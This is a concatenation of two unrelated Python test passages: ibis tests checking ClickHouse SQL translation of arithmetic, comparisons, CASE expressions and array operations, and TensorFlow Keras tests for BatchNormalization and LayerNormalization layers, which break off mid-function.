# TODO: test boolean operators
# (h & bool_col, '`h` AND (`a` > 0)'),
# (h | bool_col, '`h` OR (`a` > 0)'),
# (h ^ bool_col, 'xor(`h`, (`a` > 0))')
@pytest.mark.parametrize(
('op', 'expected'),
[
(
lambda a, b, c: (a + b) + c,
'(`int_col` + `tinyint_col`) + `double_col`',
),
(lambda a, b, c: a.log() + c, 'log(`int_col`) + `double_col`'),
(
lambda a, b, c: (b + (-(a + c))),
'`tinyint_col` + (-(`int_col` + `double_col`))',
),
],
)
def test_binary_infix_parenthesization(con, alltypes, translate, op, expected):
a = alltypes.int_col
b = alltypes.tinyint_col
c = alltypes.double_col
expr = op(a, b, c)
assert translate(expr) == expected
assert len(con.execute(expr))
def test_between(con, alltypes, translate):
expr = alltypes.int_col.between(0, 10)
assert translate(expr) == '`int_col` BETWEEN 0 AND 10'
assert len(con.execute(expr))
@pytest.mark.parametrize(
('left', 'right'),
[
(L('2017-03-31').cast(dt.date), date(2017, 4, 2)),
(date(2017, 3, 31), L('2017-04-02').cast(dt.date)),
],
)
def test_string_temporal_compare_between_dates(con, left, right):
expr = ibis.timestamp('2017-04-01').cast(dt.date).between(left, right)
result = con.execute(expr)
assert result
@pytest.mark.parametrize(
('left', 'right'),
[
(
L('2017-03-31 00:02:33').cast(dt.timestamp),
datetime(2017, 4, 1, 1, 3, 34),
),
(
datetime(2017, 3, 31, 0, 2, 33),
L('2017-04-01 01:03:34').cast(dt.timestamp),
),
],
)
def test_string_temporal_compare_between_datetimes(con, left, right):
expr = ibis.timestamp('2017-04-01 00:02:34').between(left, right)
result = con.execute(expr)
assert result
@pytest.mark.parametrize('container', [list, tuple, set])
def test_field_in_literals(con, alltypes, translate, container):
values = {'foo', 'bar', 'baz'}
foobar = container(values)
expected = tuple(values)
expr = alltypes.string_col.isin(foobar)
assert translate(expr) == f"`string_col` IN {expected}"
assert len(con.execute(expr))
expr = alltypes.string_col.notin(foobar)
assert translate(expr) == f"`string_col` NOT IN {expected}"
assert len(con.execute(expr))
@pytest.mark.parametrize('column', ['int_col', 'float_col', 'bool_col'])
def test_negate(con, alltypes, translate, column):
# clickhouse represent boolean as UInt8
expr = -getattr(alltypes, column)
assert translate(expr) == f'-`{column}`'
assert len(con.execute(expr))
@pytest.mark.parametrize(
'field',
[
'tinyint_col',
'smallint_col',
'int_col',
'bigint_col',
'float_col',
'double_col',
'year',
'month',
],
)
def test_negate_non_boolean(con, alltypes, field, df):
t = alltypes.limit(10)
expr = t.projection([(-t[field]).name(field)])
result = expr.execute()[field]
expected = -df.head(10)[field]
tm.assert_series_equal(result, expected)
def test_negate_literal(con):
expr = -L(5.245)
assert round(con.execute(expr), 3) == -5.245
@pytest.mark.parametrize(
('op', 'pandas_op'),
[
(
lambda t: (t.double_col > 20).ifelse(10, -20),
lambda df: pd.Series(
np.where(df.double_col > 20, 10, -20), dtype='int8'
),
),
(
lambda t: (t.double_col > 20).ifelse(10, -20).abs(),
lambda df: (
pd.Series(np.where(df.double_col > 20, 10, -20))
.abs()
.astype('int8')
),
),
],
)
def test_ifelse(alltypes, df, op, pandas_op, translate):
expr = op(alltypes)
result = expr.execute()
result.name = None
expected = pandas_op(df)
tm.assert_series_equal(result, expected)
def test_simple_case(con, alltypes, translate):
t = alltypes
expr = (
t.string_col.case()
.when('foo', 'bar')
.when('baz', 'qux')
.else_('default')
.end()
)
expected = """CASE `string_col`
WHEN 'foo' THEN 'bar'
WHEN 'baz' THEN 'qux'
ELSE 'default'
END"""
assert translate(expr) == expected
assert len(con.execute(expr))
def test_search_case(con, alltypes, translate):
t = alltypes
expr = (
ibis.case()
.when(t.float_col > 0, t.int_col * 2)
.when(t.float_col < 0, t.int_col)
.else_(0)
.end()
)
expected = """CASE
WHEN `float_col` > 0 THEN `int_col` * 2
WHEN `float_col` < 0 THEN `int_col`
ELSE 0
END"""
assert translate(expr) == expected
assert len(con.execute(expr))
@pytest.mark.parametrize(
'arr',
[
[1, 2, 3],
['qw', 'wq', '1'],
[1.2, 0.3, 0.4],
[[1], [1, 2], [1, 2, 3]],
],
)
@pytest.mark.parametrize(
'ids',
[
lambda arr: range(len(arr)),
lambda arr: range(-len(arr), 0),
],
)
def test_array_index(con, arr, ids):
expr = L(arr)
for i in ids(arr):
el_expr = expr[i]
el = con.execute(el_expr)
assert el == arr[i]
@pytest.mark.parametrize(
'arrays',
[
([1], [2]),
([1], [1, 2]),
([1, 2], [1]),
([1, 2], [3, 4]),
([1, 2], [3, 4], [5, 6]),
],
)
def test_array_concat(con, arrays):
expr = L([]).cast(dt.Array(dt.int8))
expected = sum(arrays, [])
for arr in arrays:
expr += L(arr)
assert con.execute(expr) == expected
@pytest.mark.parametrize(
('arr', 'times'),
[([1], 1), ([1], 2), ([1], 3), ([1, 2], 1), ([1, 2], 2), ([1, 2], 3)],
)
def test_array_repeat(con, arr, times):
expected = arr * times
expr = L(arr)
assert con.execute(expr * times) == expected
@pytest.mark.parametrize('arr', [[], [1], [1, 2, 3, 4, 5, 6]])
@pytest.mark.parametrize('start', [None, 0, 1, 2, -1, -3])
@pytest.mark.parametrize('stop', [None, 0, 1, 3, -2, -4])
def test_array_slice(con, arr, start, stop):
expr = L(arr)
assert con.execute(expr[start:stop]) == arr[start:stop]
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for normalization layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import def_function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.keras import combinations
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.layers import normalization
from tensorflow.python.keras.layers import normalization_v2
from tensorflow.python.keras.mixed_precision import policy
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker_v2
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
class BatchNormalizationTest(keras_parameterized.TestCase):
@keras_parameterized.run_all_keras_modes
def test_basic_batchnorm(self):
testing_utils.layer_test(
keras.layers.BatchNormalization,
kwargs={
'momentum': 0.9,
'epsilon': 0.1,
'gamma_regularizer': keras.regularizers.l2(0.01),
'beta_regularizer': keras.regularizers.l2(0.01)
},
input_shape=(3, 4, 2))
testing_utils.layer_test(
keras.layers.BatchNormalization,
kwargs={
'gamma_initializer': 'ones',
'beta_initializer': 'ones',
'moving_mean_initializer': 'zeros',
'moving_variance_initializer': 'ones'
},
input_shape=(3, 4, 2))
testing_utils.layer_test(
keras.layers.BatchNormalization,
kwargs={'scale': False,
'center': False},
input_shape=(3, 3))
testing_utils.layer_test(
keras.layers.BatchNormalization,
kwargs={
'gamma_initializer': 'ones',
'beta_initializer': 'ones',
'moving_mean_initializer': 'zeros',
'moving_variance_initializer': 'ones'
},
input_shape=(3, 2, 4, 2))
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_batchnorm_weights(self):
layer = keras.layers.BatchNormalization(scale=False, center=False)
layer.build((None, 3, 4))
self.assertEqual(len(layer.trainable_weights), 0)
self.assertEqual(len(layer.weights), 2)
layer = keras.layers.BatchNormalization()
layer.build((None, 3, 4))
self.assertEqual(len(layer.trainable_weights), 2)
self.assertEqual(len(layer.weights), 4)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_batchnorm_regularization(self):
layer = keras.layers.BatchNormalization(
gamma_regularizer='l1', beta_regularizer='l1')
layer.build((None, 3, 4))
self.assertEqual(len(layer.losses), 2)
max_norm = keras.constraints.max_norm
layer = keras.layers.BatchNormalization(
gamma_constraint=max_norm, beta_constraint=max_norm)
layer.build((None, 3, 4))
self.assertEqual(layer.gamma.constraint, max_norm)
self.assertEqual(layer.beta.constraint, max_norm)
@keras_parameterized.run_all_keras_modes
def test_batchnorm_convnet(self):
if test.is_gpu_available(cuda_only=True):
with self.session(use_gpu=True):
model = keras.models.Sequential()
norm = keras.layers.BatchNormalization(
axis=1, input_shape=(3, 4, 4), momentum=0.8)
model.add(norm)
model.compile(
loss='mse',
optimizer=gradient_descent.GradientDescentOptimizer(0.01),
run_eagerly=testing_utils.should_run_eagerly())
# centered on 5.0, variance 10.0
x = np.random.normal(loc=5.0, scale=10.0, size=(1000, 3, 4, 4))
model.fit(x, x, epochs=4, verbose=0)
out = model.predict(x)
out -= np.reshape(keras.backend.eval(norm.beta), (1, 3, 1, 1))
out /= np.reshape(keras.backend.eval(norm.gamma), (1, 3, 1, 1))
np.testing.assert_allclose(np.mean(out, axis=(0, 2, 3)), 0.0, atol=1e-1)
np.testing.assert_allclose(np.std(out, axis=(0, 2, 3)), 1.0, atol=1e-1)
@keras_parameterized.run_all_keras_modes
def test_batchnorm_convnet_channel_last(self):
model = keras.models.Sequential()
norm = keras.layers.BatchNormalization(
axis=-1, input_shape=(4, 4, 3), momentum=0.8)
model.add(norm)
model.compile(
loss='mse',
optimizer=gradient_descent.GradientDescentOptimizer(0.01),
run_eagerly=testing_utils.should_run_eagerly())
# centered on 5.0, variance 10.0
x = np.random.normal(loc=5.0, scale=10.0, size=(1000, 4, 4, 3))
model.fit(x, x, epochs=4, verbose=0)
out = model.predict(x)
out -= np.reshape(keras.backend.eval(norm.beta), (1, 1, 1, 3))
out /= np.reshape(keras.backend.eval(norm.gamma), (1, 1, 1, 3))
np.testing.assert_allclose(np.mean(out, axis=(0, 1, 2)), 0.0, atol=1e-1)
np.testing.assert_allclose(np.std(out, axis=(0, 1, 2)), 1.0, atol=1e-1)
@keras_parameterized.run_all_keras_modes
def test_batchnorm_correctness(self):
_run_batchnorm_correctness_test(
normalization.BatchNormalization, dtype='float32')
_run_batchnorm_correctness_test(
normalization_v2.BatchNormalization, dtype='float32')
@keras_parameterized.run_all_keras_modes
def test_batchnorm_float16(self):
_run_batchnorm_correctness_test(
normalization.BatchNormalization, dtype='float16')
_run_batchnorm_correctness_test(
normalization_v2.BatchNormalization, dtype='float16')
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
@testing_utils.enable_v2_dtype_behavior
def test_batchnorm_mixed_precision(self):
norm = keras.layers.BatchNormalization(
axis=-1,
input_shape=(4, 4, 3),
momentum=0.8,
dtype=policy.Policy('mixed_float16'))
x = np.random.normal(size=(10, 4, 4, 3))
y = norm(x)
self.assertEqual(y.dtype, 'float16')
self.assertEqual(norm.beta.dtype.base_dtype, 'float32')
self.assertEqual(norm.gamma.dtype.base_dtype, 'float32')
@combinations.generate(combinations.combine(mode=['graph', 'eager'],
fused=[True, False]))
@testing_utils.enable_v2_dtype_behavior
def test_batchnorm_mixed_precision_does_not_overflow(self, fused):
norm = keras.layers.BatchNormalization(
axis=-1,
input_shape=(1, 1, 1),
fused=fused,
dtype=policy.Policy('mixed_float16'))
x = np.array([-1000., 1000.]).reshape((2, 1, 1, 1))
y = norm(x, training=True)
expected_y = np.array([-1.0, 1.0]).reshape((2, 1, 1, 1))
self.assertAllClose(keras.backend.eval(y), expected_y)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_batchnorm_non_trainable_with_fit(self):
# We use the same data shape for all the data we use in this test.
# This will prevent any used tf.functions from retracing.
# This helps us verify that changing trainable and recompiling really
# does update the training loop, rather than a different data shape
# triggering a retrace.
data_shape = (100, 3)
inputs = keras.Input((3,))
bn = normalization_v2.BatchNormalization()
outputs = bn(inputs)
model = keras.Model(inputs, outputs)
model.compile(
'rmsprop',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
model.fit(np.random.random(data_shape), np.random.random(data_shape))
test_data = np.random.random(data_shape)
test_targets = np.random.random(data_shape)
test_loss = model.evaluate(test_data, test_targets)
bn.trainable = False
model.compile(
'rmsprop',
'mse',
run_eagerly=testing_utils.should_run_eagerly())
train_loss = model.train_on_batch(test_data, test_targets)
self.assertAlmostEqual(test_loss, train_loss)
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
def test_eager_batchnorm_in_custom_model_call_with_tf_function(self):
class MyModel(keras.Model):
def __init__(self):
super(MyModel, self).__init__()
self.bn = keras.layers.BatchNormalization()
@def_function.function()
def call(self, x, training):
return self.bn(x, training=training)
model = MyModel()
for _ in range(10):
x = constant_op.constant(0.5, shape=[1, 1])
model(x, training=True)
# Make sure the moving mean and variance have been updated
self.assertAllClose(model.bn.moving_mean.numpy(), [0.047], atol=3e-3)
self.assertAllClose(model.bn.moving_variance.numpy(), [0.9], atol=3e-2)
@combinations.generate(combinations.combine(mode=['eager']))
def test_bessels_correction(self):
# Bessel's correction is currently only used in the fused case. In the
# future, it may be used in the nonfused case as well.
x = constant_op.constant([0., 2.], shape=[2, 1, 1, 1])
layer = normalization_v2.BatchNormalization(
momentum=0.5, moving_variance_initializer='zeros')
layer(x, training=True)
self.assertTrue(layer.fused)
# Since fused is used, Bessel's correction is used. The variance of [0, 2]
# is 2 with Bessel's correction. Since the momentum is 0.5, the variance is
# 2 * 0.5 == 1.
self.assertAllEqual(self.evaluate(layer.moving_variance), [1.])
x = constant_op.constant([0., 2.], shape=[2, 1, 1, 1, 1])
layer = normalization_v2.BatchNormalization(
momentum=0.5, moving_variance_initializer='zeros')
layer(x, training=True)
self.assertFalse(layer.fused)
# Since fused is not used, Bessel's correction is not used. The variance of
# [0, 2] is 1 without Bessel's correction. Since the momentum is 0.5, the
# variance is 1 * 0.5 == 0.5.
self.assertAllEqual(self.evaluate(layer.moving_variance), [0.5])
class BatchNormalizationV1Test(keras_parameterized.TestCase):
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_v1_fused_attribute(self):
norm = normalization.BatchNormalization()
inp = keras.layers.Input((4, 4, 4))
norm(inp)
self.assertEqual(norm.fused, True)
norm = normalization.BatchNormalization(fused=False)
self.assertEqual(norm.fused, False)
inp = keras.layers.Input(shape=(4, 4, 4))
norm(inp)
self.assertEqual(norm.fused, False)
norm = normalization.BatchNormalization(virtual_batch_size=2)
self.assertEqual(norm.fused, True)
inp = keras.layers.Input(shape=(2, 2, 2))
norm(inp)
self.assertEqual(norm.fused, False)
class BatchNormalizationV2Test(keras_parameterized.TestCase):
@keras_parameterized.run_all_keras_modes
def test_basic_batchnorm_v2(self):
testing_utils.layer_test(
normalization_v2.BatchNormalization,
kwargs={'fused': True},
input_shape=(3, 3, 3, 3))
testing_utils.layer_test(
normalization_v2.BatchNormalization,
kwargs={'fused': None},
input_shape=(3, 3, 3))
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_v2_fused_attribute(self):
norm = normalization_v2.BatchNormalization()
self.assertEqual(norm.fused, None)
inp = keras.layers.Input(shape=(4, 4, 4))
norm(inp)
self.assertEqual(norm.fused, True)
norm = normalization_v2.BatchNormalization()
self.assertEqual(norm.fused, None)
inp = keras.layers.Input(shape=(4, 4))
norm(inp)
self.assertEqual(norm.fused, False)
norm = normalization_v2.BatchNormalization()
self.assertIsNone(norm.fused)
inp = keras.layers.Input(shape=(4, 4, 4, 4))
norm(inp)
self.assertEqual(norm.fused, False)
norm = normalization_v2.BatchNormalization(virtual_batch_size=2)
self.assertEqual(norm.fused, False)
inp = keras.layers.Input(shape=(4, 4, 4))
norm(inp)
self.assertEqual(norm.fused, False)
norm = normalization_v2.BatchNormalization(fused=False)
self.assertEqual(norm.fused, False)
inp = keras.layers.Input(shape=(4, 4, 4))
norm(inp)
self.assertEqual(norm.fused, False)
norm = normalization_v2.BatchNormalization(fused=True, axis=[3])
self.assertEqual(norm.fused, True)
inp = keras.layers.Input(shape=(4, 4, 4))
norm(inp)
self.assertEqual(norm.fused, True)
with self.assertRaisesRegex(ValueError, 'fused.*renorm'):
normalization_v2.BatchNormalization(fused=True, renorm=True)
with self.assertRaisesRegex(ValueError, 'fused.*when axis is 1 or 3'):
normalization_v2.BatchNormalization(fused=True, axis=2)
with self.assertRaisesRegex(ValueError, 'fused.*when axis is 1 or 3'):
normalization_v2.BatchNormalization(fused=True, axis=[1, 3])
with self.assertRaisesRegex(ValueError, 'fused.*virtual_batch_size'):
normalization_v2.BatchNormalization(fused=True, virtual_batch_size=2)
with self.assertRaisesRegex(ValueError, 'fused.*adjustment'):
normalization_v2.BatchNormalization(fused=True,
adjustment=lambda _: (1, 0))
norm = normalization_v2.BatchNormalization(fused=True)
self.assertEqual(norm.fused, True)
inp = keras.layers.Input(shape=(4, 4))
with self.assertRaisesRegex(ValueError, '4D or 5D input tensors'):
norm(inp)
def test_updates_in_wrap_function(self):
def my_func():
layer = normalization.BatchNormalization()
x = array_ops.ones((10, 1))
y = layer(x, training=True)
# Updates should be tracked in a `wrap_function`.
self.assertLen(layer.updates, 2)
return y
wrapped_fn = wrap_function.wrap_function(my_func, [])
wrapped_fn()
@keras_parameterized.run_all_keras_modes
def test_basic_batchnorm_v2_none_shape_and_virtual_batch_size(self):
# Test case for GitHub issue for 32380
norm = normalization_v2.BatchNormalization(virtual_batch_size=8)
inp = keras.layers.Input(shape=(None, None, 3))
_ = norm(inp)
def _run_batchnorm_correctness_test(layer, dtype='float32', fused=False):
model = keras.models.Sequential()
model.add(keras.Input(shape=(2, 2, 2), dtype=dtype))
norm = layer(momentum=0.8, fused=fused)
model.add(norm)
if dtype == 'float16':
# Keras models require float32 losses.
model.add(keras.layers.Lambda(lambda x: keras.backend.cast(x, 'float32')))
model.compile(
loss='mse',
optimizer=gradient_descent.GradientDescentOptimizer(0.01),
run_eagerly=testing_utils.should_run_eagerly())
# centered on 5.0, variance 10.0
x = (np.random.normal(loc=5.0, scale=10.0, size=(1000, 2, 2, 2))
.astype(dtype))
model.fit(x, x, epochs=4, verbose=0)
out = model.predict(x)
out -= keras.backend.eval(norm.beta)
out /= keras.backend.eval(norm.gamma)
np.testing.assert_allclose(out.mean(), 0.0, atol=2e-1)
np.testing.assert_allclose(out.std(), 1.0, atol=2e-1)
@parameterized.parameters(
[normalization.BatchNormalization, normalization_v2.BatchNormalization])
class NormalizationLayersGraphModeOnlyTest(
test.TestCase, parameterized.TestCase):
def test_shared_batchnorm(self, layer):
"""Test that a BN layer can be shared across different data streams."""
with self.cached_session():
# Test single layer reuse
bn = layer()
x1 = keras.layers.Input(shape=(10,))
_ = bn(x1)
x2 = keras.layers.Input(shape=(10,))
y2 = bn(x2)
x = np.random.normal(loc=5.0, scale=10.0, size=(2, 10))
model = keras.models.Model(x2, y2)
model.compile(gradient_descent.GradientDescentOptimizer(0.01), 'mse')
model.train_on_batch(x, x)
# Test model-level reuse
x3 = keras.layers.Input(shape=(10,))
y3 = model(x3)
new_model = keras.models.Model(x3, y3, name='new_model')
new_model.compile(gradient_descent.GradientDescentOptimizer(0.01), 'mse')
new_model.train_on_batch(x, x)
def test_that_trainable_disables_updates(self, layer):
with self.cached_session():
val_a = np.random.random((10, 4))
val_out = np.random.random((10, 4))
a = keras.layers.Input(shape=(4,))
layer = layer(input_shape=(4,))
b = layer(a)
model = keras.models.Model(a, b)
model.trainable = False
model.compile(gradient_descent.GradientDescentOptimizer(0.01), 'mse')
x1 = model.predict(val_a)
model.train_on_batch(val_a, val_out)
x2 = model.predict(val_a)
self.assertAllClose(x1, x2, atol=1e-7)
model.trainable = True
model.compile(gradient_descent.GradientDescentOptimizer(0.01), 'mse')
model.train_on_batch(val_a, val_out)
x2 = model.predict(val_a)
assert np.abs(np.sum(x1 - x2)) > 1e-5
layer.trainable = False
model.compile(gradient_descent.GradientDescentOptimizer(0.01), 'mse')
x1 = model.predict(val_a)
model.train_on_batch(val_a, val_out)
x2 = model.predict(val_a)
self.assertAllClose(x1, x2, atol=1e-7)
def test_batchnorm_trainable(self, layer):
"""Tests that batchnorm layer is trainable when learning phase is enabled.
Computes mean and std for current inputs then
applies batch normalization using them.
Args:
layer: Either V1 or V2 of BatchNormalization layer.
"""
# TODO(fchollet): enable in all execution modes when issue with
# learning phase setting is resolved.
with ops.Graph().as_default(), self.cached_session():
bn_mean = 0.5
bn_std = 10.
val_a = np.expand_dims(np.arange(10.), axis=1)
def get_model(bn_mean, bn_std):
inp = keras.layers.Input(shape=(1,))
x = layer()(inp)
model1 = keras.models.Model(inp, x)
model1.set_weights([
np.array([1.]),
np.array([0.]),
np.array([bn_mean]),
np.array([bn_std**2])
])
return model1
# Simulates training-mode with trainable layer.
# Should use mini-batch statistics.
with keras.backend.learning_phase_scope(1):
model = get_model(bn_mean, bn_std)
model.compile(loss='mse', optimizer='rmsprop')
out = model.predict(val_a)
self.assertAllClose(
(val_a - np.mean(val_a)) / np.std(val_a), out, atol=1e-3)
def _run_layernorm_correctness_test(layer, dtype='float32'):
model = keras.models.Sequential()
model.add(keras.layers.Lambda(lambda x: math_ops.cast(x, dtype='float16')))
norm = layer(input_shape=(2, 2, 2), dtype=dtype)
model.add(norm)
model.compile(
loss='mse',
optimizer=gradient_descent.GradientDescentOptimizer(0.01),
run_eagerly=testing_utils.should_run_eagerly())
# centered on 5.0, variance 10.0
x = (np.random.normal(loc=5.0, scale=10.0, size=(1000, 2, 2, 2))
.astype(dtype))
model.fit(x, x, epochs=4, verbose=0)
out = model.predict(x)
out -= keras.backend.eval(norm.beta)
out /= keras.backend.eval(norm.gamma)
np.testing.assert_allclose(out.mean(), 0.0, atol=1e-1)
np.testing.assert_allclose(out.std(), 1.0, atol=1e-1)
class LayerNormalizationTest(keras_parameterized.TestCase):
@keras_parameterized.run_all_keras_modes
def test_basic_layernorm(self):
testing_utils.layer_test(
keras.layers.LayerNormalization,
kwargs={
'gamma_regularizer': keras.regularizers.l2(0.01),
'beta_regularizer': keras.regularizers.l2(0.01)
},
input_shape=(3, 4, 2))
testing_utils.layer_test(
keras.layers.LayerNormalization,
kwargs={
'gamma_initializer': 'ones',
'beta_initializer': 'ones',
},
input_shape=(3, 4, 2))
testing_utils.layer_test(
keras.layers.LayerNormalization,
kwargs={'scale': False,
'center': False},
input_shape=(3, 3))
testing_utils.layer_test(
keras.layers.LayerNormalization,
kwargs={'axis': (-3, -2, -1)},
input_shape=(2, 8, 8, 3))
@keras_parameterized.run_all_keras_modes
def test_non_fused_layernorm(self):
testing_utils.layer_test(
keras.layers.LayerNormalization,
kwargs={'axis': -2},
input_shape=(3, 4, 2))
testing_utils.layer_test(
keras.layers.LayerNormalization,
kwargs={'axis': (-3, -2)},
input_shape=(2, 8, 8, 3))
testing_utils.layer_test(
keras.layers.LayerNormalization,
kwargs={'axis': (-3, -1)},
input_shape=(2, 8, 8, 3))
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_layernorm_weights(self):
layer = keras.layers.LayerNormalization(scale=False, center=False)
layer.build((None, 3, 4))
self.assertEqual(len(layer.trainable_weights), 0)
self.assertEqual(len(layer.weights), 0)
layer = keras.layers.LayerNormalization()
layer.build((None, 3, 4))
self.assertEqual(len(layer.trainable_weights), 2)
self.assertEqual(len(layer.weights), 2)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_layernorm_regularization(self):
layer = keras.layers.LayerNormalization(
gamma_regularizer='l1', beta_regularizer='l1')
layer.build((None, 3, 4))
self.assertEqual(len(layer.losses), 2)
max_norm = keras.constraints.max_norm
layer = keras.layers.LayerNormalization(
gamma_constraint=max_norm, beta_constraint=max_norm)
layer.build((None, 3, 4))
self.assertEqual(layer.gamma.constraint, max_norm)
self.assertEqual(layer.beta.constraint, max_norm)
@keras_parameterized.run_all_keras_modes
def test_layernorm_convnet_channel_last(self):
model = keras.models.Sequential()
norm = keras.layers.LayerNormalization(input_shape=(4, 4, 3))
model.add(norm)
model.compile(
loss='mse',
optimizer=gradient_descent.GradientDescentOptimizer(0.01),
run_eagerly=testing_utils.should_run_eagerly())
# centered on 5.0, variance 10.0
x = np.random.normal(loc=5.0, scale=10.0, size=(1000, 4, 4, 3))
model.fit(x, x, epochs=4, verbose=0)
out = model.predict(x)
out -= np.reshape(keras.backend.eval(norm.beta), (1, 1, 1, 3))
out /= np.reshape(keras.backend.eval(norm.gamma), (1, 1, 1, 3))
np.testing.assert_allclose(np.mean(out, axis=(0, 1, 2)), 0.0, atol=1e-1)
np.testing.assert_allclose(np.std(out, axis=(0, 1, 2)), 1.0, atol=1e-1)
@keras_parameterized.run_all_keras_modes
def test_layernorm_correctness(self):
_run_layernorm_correctness_test(
normalization.LayerNormalization, dtype='float32')
@keras_parameterized.run_all_keras_modes
def test_layernorm_mixed_precision(self):
_run_layernorm_correctness_test(
normalization.LayerNormalization, dtype='float16')
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def testIncorrectAxisType(self):
with self.assertRaisesRegex(TypeError,
r'Expected an int or a list/tuple of ints'):
_ = normalization.LayerNormalization(axis={'axis': -1})
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def testInvalidAxis(self):
with self.assertRaisesRegex(ValueError, r'Invalid axis: 3'):
layer_norm = normalization.LayerNormalization(axis=3)
layer_norm.build(input_shape=(2, 2, 2))
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def testDuplicateAxis(self):
with self.assertRaisesRegex(ValueError, r'Duplicate axis:'):
layer_norm = normalization.LayerNormalization(axis=[-1, -1])
layer_norm.build(input_shape=(2, 2, 2))
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def testFusedAttr(self):
layer_norm = normalization.LayerNormalization(axis=[-2, -1])
layer_norm.build(input_shape=(2, 2, 2))
self.assertEqual(layer_norm._fused, True)
class LayerNormalizationNumericsTest(keras_parameterized.TestCase):
"""Tests LayerNormalization has correct and numerically stable outputs."""
def _expected_layer_norm(self, x, beta, gamma, batch_input_shape, axis,
epsilon):
"""Returns the layer norm, which is computed using NumPy."""
broadcast_shape = [batch_input_shape[i] if i in axis else 1
for i in range(len(batch_input_shape))]
mean = np.mean(x, axis=axis, keepdims=True)
var = np.var(x, axis=axis, keepdims=True)
expected = (x - mean) / np.sqrt(var + epsilon)
expected *= np.reshape(gamma, broadcast_shape)
expected += np.reshape(beta, broadcast_shape)
return expected
def _test_forward_pass(self, batch_input_shape, axis, fp64_tol=1e-14,
fp32_tol=1e-6, fp16_tol=1e-2):
"""Tests the forward pass of layer normalization.
Args:
batch_input_shape: The input shape that will be used to test, including
the batch dimension.
axis: A list of axises to normalize. Will be passed to the `axis` argument
of LayerNormalization.
fp64_tol: The relative and absolute tolerance for float64.
fp32_tol: The relative and absolute tolerance for float32.
fp16_tol: The relative and absolute tolerance for float16.
"""
param_shape = [batch_input_shape[i] for i in axis]
param_elems = 1
for dim in param_shape:
param_elems *= dim
beta = np.arange(param_elems, dtype='float64').reshape(param_shape)
gamma = np.arange(1, param_elems + 1, dtype='float64').reshape(param_shape)
x = np.random.normal(size=batch_input_shape)
for epsilon in 1e-12, 1e-3:
expected = self._expected_layer_norm(x, beta, gamma, batch_input_shape,
axis, epsilon)
for dtype in 'float64', 'float32', 'float16':
norm = normalization.LayerNormalization(
axis=axis, dtype=dtype, batch_input_shape=batch_input_shape,
epsilon=epsilon, beta_initializer=keras.initializers.constant(beta),
gamma_initializer=keras.initializers.constant(gamma))
y = norm(keras.backend.cast(x, dtype))
actual = keras.backend.eval(y)
if dtype == 'float64':
tol = fp64_tol
elif dtype == 'float32':
tol = fp32_tol
else:
assert dtype == 'float16'
tol = fp16_tol
# We use absolute tolerances in addition to relative tolerances, because
# some of the values are very close to zero.
self.assertAllClose(expected, actual, rtol=tol, atol=tol)
@combinations.generate(combinations.combine(mode=['graph', 'eager']))
def test_forward(self):
# For numeric stability, we ensure the axis's dimension(s) have at least 4
# elements.
self._test_forward_pass((4, 3), (0,))
self._test_forward_pass((3, 4), (1,))
self._test_forward_pass((4, 3, 2), (0,))
self._test_forward_pass((2, 4, 2), (1,))
self._test_forward_pass((2, 3, 4), (2,), fp16_tol=5e-2)
self._test_forward_pass((2, 3, 2), (0, 2))
self._test_forward_pass((2, 2, 2, 2), (1, 3))
self._test_forward_pass((2, 2, 2, 2), (2, 3))
self._test_forward_pass((2, 3, 4, 5), (3,))
def _test_backward_pass(self, batch_input_shape, axis, fp64_tol=1e-5,
fp32_tol=1e-5, fp16_tol=2e-2):
"""Tests the backwards pass of layer normalization.
Args:
batch_input_shape: The input shape that will be used to test, including
the batch dimension.
axis: A list of axises to normalize. Will be passed to the `axis` argument
of LayerNormalization.
fp64_tol: The relative and absolute tolerance for float64.
fp32_tol: The relative and absolute tolerance for float32.
fp16_tol: The relative and absolute tolerance for float16.
"""
param_shape = [batch_input_shape[i] for i in axis]
param_elems = 1
for dim in param_shape:
param_elems *= dim
beta = np.arange(param_elems, dtype='float64').reshape(param_shape)
gamma = np.arange(1, param_elems + 1, dtype='float64').reshape(param_shape)
x = np.random.normal(size=batch_input_shape)
for epsilon in 1e-12, 1e-3:
# Float64 must come first in this list, as we use the float64 numerical
# gradients to compare to the float32 and float16 symbolic gradients as
# well. Computing float32/float16 numerical gradients is too numerically
# unstable.
for dtype in 'float64', 'float32', 'float16':
norm = normalization.LayerNormalization(
axis=axis, dtype=dtype, batch_input_shape=batch_input_shape,
epsilon=epsilon, beta_initializer=keras.initializers.constant(beta),
gamma_initializer=keras.initializers.constant(gamma))
norm.build(x.shape)
# pylint: disable=cell-var-from-loop
def forward_fn(x, beta, gamma):
# We must monkey-patch the attributes of `norm` with the function
# arguments, so that the gradient checker will properly compute their
# gradients. The gradient checker computes gradients with respect to
# the input arguments of `f`.
with test.mock.patch.object(norm, 'beta', beta):
